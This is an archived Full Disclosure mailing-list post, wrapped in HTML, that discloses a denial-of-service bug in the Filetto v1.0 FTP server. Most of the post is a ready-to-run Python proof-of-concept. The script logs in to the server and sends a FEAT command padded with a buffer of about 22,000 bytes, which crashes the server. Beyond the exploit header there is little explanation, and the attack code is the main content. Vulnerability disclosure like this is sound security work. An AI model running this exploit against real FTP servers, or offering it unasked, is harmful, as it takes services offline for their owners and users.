[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Filetto v1.0 - 'FEAT' Denial of Service (PoC)
From:       <socket_0x03 () teraexe ! com>
Date:       2020-05-20 12:20:34
Message-ID: 20200520052034.cb4d70574c5c1c19832af8140c69aa1b.5cf62eb04b.wbe () email27 ! secureserver ! net
[Download RAW message or body]

[Attachment #2 (unknown)]

<html><body><span style="font-family:Verdana; color:#000000; font-size:10pt;"><div \
style=""><font face="verdana, geneva" style=""><span style=""><br \
style=""></span></font></div><div style=""><font face="verdana, geneva" style=""><span \
style=""><br style=""></span></font></div><div style=""><font face="verdana, geneva" \
style=""><span style="">====================================================================================================</span></font></div><div \
style=""><font face="verdana, geneva" style=""><span style="">======================== [ \
Filetto v1.0 - 'FEAT' Denial of Service (PoC) ] \
=========================</span></font></div><div style=""><font face="verdana, geneva" \
style=""><span style="">====================================================================================================</span></font></div><div \
style=""><font face="verdana, geneva" style=""><span style=""><br \
style=""></span></font></div><div style=""><font face="verdana, geneva" style=""><span \
style=""># Exploit Title: Filetto v1.0 - 'FEAT' Denial of Service \
(PoC)&nbsp;</span></font></div><div style=""><font face="verdana, geneva" style=""><span \
style=""># Date: [05-13-2020]</span></font></div><div style=""><font face="verdana, geneva" \
style=""><span style="">#</span></font></div><div style=""><font face="verdana, geneva" \
style=""><span style=""># Found by: Alvaro J. Gene (Socket_0x03)</span></font></div><div \
style=""><font face="verdana, geneva" style=""><span style=""># Email: Socket_0x03 (at) teraexe \
(dot) com</span></font></div><div style=""><font face="verdana, geneva" style=""><span \
style=""># Website: www (dot) teraexe (dot) com</span></font></div><div style=""><font \
face="verdana, geneva" style=""><span style="">#</span></font></div><div style=""><font \
face="verdana, geneva" style=""><span style=""># Software Link: <a \
href="https://sourceforge.net/projects/filetto">https://sourceforge.net/projects/filetto</a></span></font></div><div \
style=""><font face="verdana, geneva" style=""><span style=""># Vulnerable Application: \
Filetto</span></font></div><div style=""><font face="verdana, geneva" style=""><span style=""># \
Version: 1.0 (last version. Updated: 01/31/2020)</span></font></div><div style=""><font \
face="verdana, geneva" style=""><span style=""># Server: FTP Server</span></font></div><div \
style=""><font face="verdana, geneva" style=""><span style=""># Vulnerable Command: \
FEAT</span></font></div><div style=""><font face="verdana, geneva" style=""><span style=""># \
Tested on: Windows XP SP2 and Windows 7 SP1</span></font></div><div style=""><font \
face="verdana, geneva" style=""><span style=""><br style=""></span></font></div><div \
style=""><font face="verdana, geneva" style=""><span style=""><br \
style=""></span></font></div><div style=""><font face="verdana, geneva" style=""><span \
style="">from socket import *</span></font></div><div style=""><font face="verdana, geneva" \
style=""><span style=""><br style=""></span></font></div><div style=""><font face="verdana, \
geneva" style=""><span style="">host = "192.168.0.14"</span></font></div><div style=""><font \
face="verdana, geneva" style=""><span style="">port = 2021</span></font></div><div \
style=""><font face="verdana, geneva" style=""><span style="">username = \
"Socket_0x03"</span></font></div><div style=""><font face="verdana, geneva" style=""><span \
style="">password = "password"</span></font></div><div style=""><font face="verdana, geneva" \
style=""><span style=""><br style=""></span></font></div><div style=""><font face="verdana, \
geneva" style=""><span style="">s = socket(AF_INET, SOCK_STREAM)</span></font></div><div \
style=""><font face="verdana, geneva" style=""><span style="">s.connect((host, \
port))</span></font></div><div style=""><font face="verdana, geneva" style=""><span \
style="">print s.recv(1024)</span></font></div><div style=""><font face="verdana, geneva" \
style=""><span style=""><br style=""></span></font></div><div style=""><font face="verdana, \
geneva" style=""><span style="">s.send("USER %s\r\n" % (username))</span></font></div><div \
style=""><font face="verdana, geneva" style=""><span style="">print \
s.recv(1024)</span></font></div><div style=""><font face="verdana, geneva" style=""><span \
style=""><br style=""></span></font></div><div style=""><font face="verdana, geneva" \
style=""><span style="">s.send("PASS %s\r\n" % (password))</span></font></div><div \
style=""><font face="verdana, geneva" style=""><span style="">print \
s.recv(1024)</span></font></div><div style=""><font face="verdana, geneva" style=""><span \
style=""><br style=""></span></font></div><div style=""><font face="verdana, geneva" \
style=""><span style="">buffer = "FEAT "</span></font></div><div style=""><font face="verdana, \
geneva" style=""><span style="">buffer += "\x41\x2c" * 11008</span></font></div><div \
style=""><font face="verdana, geneva" style=""><span style="">buffer += \
"\r\n"</span></font></div><div style=""><font face="verdana, geneva" style=""><span \
style=""><br style=""></span></font></div><div style=""><font face="verdana, geneva" \
style=""><span style="">s.send(buffer)</span></font></div><div style=""><font face="verdana, \
geneva" style=""><span style="">print s.recv(1024)</span></font></div><div style=""><font \
face="verdana, geneva" style=""><span style=""><br style=""></span></font></div><div \
style=""><font face="verdana, geneva" style=""><span style="">s.close()</span></font></div><div \
style=""><br style=""></div></span></body></html>



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic